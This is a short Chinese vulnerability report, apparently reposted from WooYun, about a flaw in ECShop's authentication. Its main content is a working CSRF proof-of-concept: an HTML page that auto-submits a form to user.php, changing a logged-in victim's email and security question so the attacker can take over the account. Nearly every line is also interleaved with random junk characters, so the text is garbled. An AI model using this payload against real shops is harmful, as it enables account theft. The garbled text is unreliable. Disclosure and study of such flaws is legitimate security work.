简要描述:, M; E% c6 E& a; R: {9 y$ g1 f
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现% X, Q' V( t' r) }& ]- B
/ F: {# [# u0 {9 S1 A# U8 {
Demo For:http://www.wooyun.org/bug.php?action=view&id=3959 z) V; F5 m+ S+ ~! s
. R2 Q9 ]' y/ t7 ^
详细说明:* R# ~5 X1 G0 O
利用csrf和xss可以突破官方所说的“障碍”6 v& e4 A% b$ ~, @6 H
xss版本已经有人说明8 r" _* x3 r2 C4 v2 ]
这里给出csrf版本
/ v$ U1 |3 n* A( N
2 s' [( \. F H" r+ ^8 \% Y, v/ N漏洞证明:+ ~# J# q3 K0 @# P* d& z' X
<html>: S8 T# V [, ~$ g
<body>
) ?/ f+ e Q! S<form action="http://www.wooyun.org/ecshop/user.php" method="POST">2 _& O( _6 T' k: a/ `7 t$ S
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
* ^4 x" }- t7 f, ?<INPUT TYPE="text" NAME="act" value="act_edit_profile">) T- G+ m* j) W6 u$ X7 v
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
3 U. M2 X/ ^/ \) O8 |, \, O<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
0 f. T* w; g; Q/ V: P</body>6 E4 v/ ~" R* q' |
<script>( r( W1 D. K- {5 `
document.forms[0].submit();5 S. p \+ V: U3 b3 `4 C
</script>
4 [* l3 f0 T; r</html>
5 D4 z$ h; d% g构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
6 e7 n; ~: d4 D" @* f5 E2 o- i! e. }! M' k' p6 f
|